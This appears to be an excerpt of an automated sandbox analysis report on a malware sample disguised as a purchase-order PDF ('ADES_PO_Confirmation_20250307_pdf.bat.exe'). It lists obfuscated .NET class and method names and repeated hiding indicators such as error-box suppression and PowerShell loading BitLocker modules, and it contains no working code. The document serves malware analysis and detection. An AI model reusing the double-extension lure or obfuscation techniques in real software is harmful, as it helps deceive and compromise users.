            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csHigh entropy of concatenated method names: 'F0tJR8bBxC', 'edjJ6NMc2j', 'AZmJsulu7o', 'c1aJTQV5Q2', 'd45J0HLk1u', 'uLmJcbjMtR', 'NBEJF0DX0m', 'WZWJ5rFWgP', 'LsOJ4RLby8', 'v0sJoTordG'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Fn2HvbwJnXbEZjdvJpm.csHigh entropy of concatenated method names: 'q3fGARBWoa', 'EeJGzkvT6C', 'AgQ1uMYdJn', 'blPOmhtAkAbaNfospWF', 'FJc4lFt8iIvcFcLM8tr', 'w5xiKntwoTK87THN7ua', 'FDWrL9ttCnKrD49aN8N'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, JRLCkTB2iKYt2deA3G.csHigh entropy of concatenated method names: 'mMiwFmn7RA', 'uVVw5mcdFL', 'kGywo4mANk', 'iwfwPkk1oL', 'YwBwgHIfT9', 'bQTwYL0bQL', 'dfRRpXLSIriAq9GSqE', 'Auca8JqS2sQ1hPL1cx', 'Pbaww8Lwqa', 'EDfwJL2MqZ'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Id4794A68bvlq9Tmu6.csHigh entropy of concatenated method names: 'MCDNTNdN4Q', 'VlIN0Z5yGt', 'tGCNcMVtK4', 'jTbNFLVp7j', 'iFlNdDXZMo', 'DvKN5CJsly', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, VHCyAvwwSnfSMRB2CvQ.csHigh entropy of concatenated method names: 'BHsNApvoQE', 'So4NzTnhi6', 'HxTGuYIpoi', 'zK1GwfebhO', 'zg8GbvATKY', 'AmsGJjC4LX', 'tw6GBS12g4', 'QcOGRkheRU', 'mswG6hD7nY', 'GiYGsV2w96'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Hmn7RAV1VVmcdFLUpJ.csHigh entropy of concatenated method names: 'uaSsClHEOy', 'gvtsMU6Xel', 'BPFspvmEkw', 'oPrsx1dsIJ', 'AAus77I48p', 'rS9sWLW214', 'yNLsm39wZG', 'eONsrPE6oq', 'jQAsZMXuIl', 'Y3FsATQBu5'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, ugQTIBkKVUWKgCBNfN.csHigh entropy of concatenated method names: 'GKNF6StDrU', 'WBdFTmIHWg', 'ADEFcwCy9d', 'reicAMVeqD', 'cmjczoOBAB', 'st9Fur9H5B', 'a6uFwIq5tq', 'GjpFbmjQZa', 'mkwFJnxV1G', 'oHPFBaTZjw'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, wdqhZIpG3YTNyHu4jq.csHigh entropy of concatenated method names: 'ToString', 'DsuYvTybB7', 'lOrYiLFbbw', 'ECfYQRPEeJ', 'pMOYqgIZec', 'ifkYOjE8f9', 'axgYEwjcSt', 'zTgYkP022y', 'ri4Yteltvp', 'i50YXMsh8g'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, o8iFQLwBochUMBr0eaw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O5w1dW8v1L', 'UCt1NPyTBf', 'w7E1GjTlG0', 'dOH11NQxLE', 'kRe12D0Fdg', 'jnB1D2HFU0', 'uQM13r6Sd3'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, RPLZj5yGy4mANkcwfk.csHigh entropy of concatenated method names: 'dHRThpYPU7', 'EIkTL07cJR', 'Rg9TVLHf9S', 'PMUTyZKewl', 'y7STg8ZS5Y', 'GCwTYG21UI', 'KYIT9u36MS', 'VtKTa5JBe8', 'aLtTd5UcHK', 'W9nTN0rrFi'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, obYsXpsmjTAyib2UA0.csHigh entropy of concatenated method names: 'Dispose', 'mFPwZualxL', 'BdNbiCgT7m', 'xMV2lh9uQY', 'q78wApOpfL', 'QK4wz8s0Vk', 'ProcessDialogKey', 'muMbumIwsu', 'oq8bwvUKr1', 'dWkbbqd479'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, S2rj1fC9toV914MT84.csHigh entropy of concatenated method names: 'ks0gKMPptl', 'SQUgSgMFIt', 'gVXgCvdyBm', 'OPJgMQwdUT', 'in3gil4AEb', 'cO1gQdhplp', 'ILtgqfODVT', 'LWmgOA5XxU', 'uLEgEOjQf7', 'TBBgkyMl1A'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, cBeF6nW4EIJaEEshCQ.csHigh entropy of concatenated method names: 'afO9ro2VW3', 'aZC9AnvbsI', 'RuqauQY1OW', 'TedawpNhjt', 'kWH9vYvy2O', 'InT9SdSpi8', 'xAU98AnNue', 'N519CVOKf4', 'wqD9MeemOA', 'SHo9p4BwgF'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, sue0SQxK3yAIyR3D0n.csHigh entropy of concatenated method names: 'tTI9oBauXT', 'fuP9PVFJdE', 'ToString', 'NPC96XRGrA', 'N0D9sO2OMn', 'uiH9T17wFt', 'e2290XNpJ1', 'Ur79c6wKSt', 'vki9FZeqHg', 'b3T95sEkWu'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, RmIwsuZgq8vUKr1BWk.csHigh entropy of concatenated method names: 'SStdjRlUgG', 'UbrdiX91cg', 'WrXdQebOcL', 'JMwdqUZsv8', 'XhOdOIYwy5', 'iaidEtjBDm', 'EIGdkREMp9', 'sx3dt3y5mo', 'Nx9dXTbL1F', 'bVqdK8u4Mo'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, TZKVJEwu1S7Dwpl69xs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f7UNvmH0Iv', 'YQeNSRxV2T', 'GW1N8CwV5k', 'IBcNCpKIOC', 'mpyNMFmbgq', 'aAaNpjawgX', 'PZGNxG3dGr'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, mcKASmXIc4M5Zs7oyt.csHigh entropy of concatenated method names: 'UpCFHxySVL', 'YUjFfwoi5w', 'kmMFlxLCJK', 'MjnFhWAEJE', 'lQHFU49Ge1', 'uPmFLjEXlV', 'bVpFebvItO', 'LMjFVMHhVj', 'PWYFy01JW8', 'osKFnfosNy'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, P6MvSxq2AsLekko3kL.csHigh entropy of concatenated method names: 'wNCc3vnO63', 'OnycHEoCkb', 'ahscl7pgHL', 'XGFchrXRFI', 'BDScL1FwSR', 'strcefMUk4', 'CfYcy4oGx2', 'iwZcnBhkj4', 'mv8SjqAmCFffRUTLJB5', 'FxUqQSAsXWnTJ0ShsqJ'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, dq89XC800jLRxVaSeu.csHigh entropy of concatenated method names: 'G9FIV4w3rq', 'B0gIy2Oi0Y', 'xuFIj8RCW2', 'tE1IiY9goi', 'stfIqYXba4', 'Q7BIO83s5e', 'NXhIk9E1Bd', 'TTdItvj688', 'ofJIKvIyOZ', 'zybIvvpC4I'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, YNT12PbJuUTro0jRRL.csHigh entropy of concatenated method names: 'lPMl3sdHP', 'D54hyVw3A', 'oEhLcoo1e', 'elVeExdAu', 'iRfypkcs5', 'Nj1ng9HXE', 'EoudaF6m9fiWxi9Ydu', 'G8BMLih14qFpQy6xLZ', 'CLSQiHVFnMdRfbvtWi', 'iO2aRhGFB'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, ApXJhlzHg5w5KARFHc.csHigh entropy of concatenated method names: 'VbENLOobJg', 'gjMNVnchpu', 'HrONy9MK9S', 'oquNjlqbF9', 'DwXNim1mst', 'hAONqTd4Zr', 'OrnNO8pPr9', 'LvJN3pRIKp', 'hN2NHLsSoj', 'xswNf9mDcK'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, frYXE2mLkoFPualxLa.csHigh entropy of concatenated method names: 'FThdgVZEsc', 'KAfd98jjKp', 'crBddZ7IDc', 'aODdGN6p7H', 'meWd2GY1Yh', 'NAhd30YlhO', 'Dispose', 'uyha6ioIZf', 'ke4asJxY99', 'XrwaTQZyS6'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, yT9wQTjL0bQLg61YXm.csHigh entropy of concatenated method names: 'n2LcRD57RE', 'mVOcsrdgJl', 'vaxc0yZgwW', 'hbTcF4jMA3', 'TpHc5gvqdf', 'OxI075glkh', 'Boo0WOP2RT', 'gYE0mZLWRv', 'HxK0rba8Tu', 'H9o0ZHxGo1'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csHigh entropy of concatenated method names: 'F0tJR8bBxC', 'edjJ6NMc2j', 'AZmJsulu7o', 'c1aJTQV5Q2', 'd45J0HLk1u', 'uLmJcbjMtR', 'NBEJF0DX0m', 'WZWJ5rFWgP', 'LsOJ4RLby8', 'v0sJoTordG'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Fn2HvbwJnXbEZjdvJpm.csHigh entropy of concatenated method names: 'q3fGARBWoa', 'EeJGzkvT6C', 'AgQ1uMYdJn', 'blPOmhtAkAbaNfospWF', 'FJc4lFt8iIvcFcLM8tr', 'w5xiKntwoTK87THN7ua', 'FDWrL9ttCnKrD49aN8N'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, JRLCkTB2iKYt2deA3G.csHigh entropy of concatenated method names: 'mMiwFmn7RA', 'uVVw5mcdFL', 'kGywo4mANk', 'iwfwPkk1oL', 'YwBwgHIfT9', 'bQTwYL0bQL', 'dfRRpXLSIriAq9GSqE', 'Auca8JqS2sQ1hPL1cx', 'Pbaww8Lwqa', 'EDfwJL2MqZ'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Id4794A68bvlq9Tmu6.csHigh entropy of concatenated method names: 'MCDNTNdN4Q', 'VlIN0Z5yGt', 'tGCNcMVtK4', 'jTbNFLVp7j', 'iFlNdDXZMo', 'DvKN5CJsly', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, VHCyAvwwSnfSMRB2CvQ.csHigh entropy of concatenated method names: 'BHsNApvoQE', 'So4NzTnhi6', 'HxTGuYIpoi', 'zK1GwfebhO', 'zg8GbvATKY', 'AmsGJjC4LX', 'tw6GBS12g4', 'QcOGRkheRU', 'mswG6hD7nY', 'GiYGsV2w96'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Hmn7RAV1VVmcdFLUpJ.csHigh entropy of concatenated method names: 'uaSsClHEOy', 'gvtsMU6Xel', 'BPFspvmEkw', 'oPrsx1dsIJ', 'AAus77I48p', 'rS9sWLW214', 'yNLsm39wZG', 'eONsrPE6oq', 'jQAsZMXuIl', 'Y3FsATQBu5'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, ugQTIBkKVUWKgCBNfN.csHigh entropy of concatenated method names: 'GKNF6StDrU', 'WBdFTmIHWg', 'ADEFcwCy9d', 'reicAMVeqD', 'cmjczoOBAB', 'st9Fur9H5B', 'a6uFwIq5tq', 'GjpFbmjQZa', 'mkwFJnxV1G', 'oHPFBaTZjw'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, wdqhZIpG3YTNyHu4jq.csHigh entropy of concatenated method names: 'ToString', 'DsuYvTybB7', 'lOrYiLFbbw', 'ECfYQRPEeJ', 'pMOYqgIZec', 'ifkYOjE8f9', 'axgYEwjcSt', 'zTgYkP022y', 'ri4Yteltvp', 'i50YXMsh8g'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
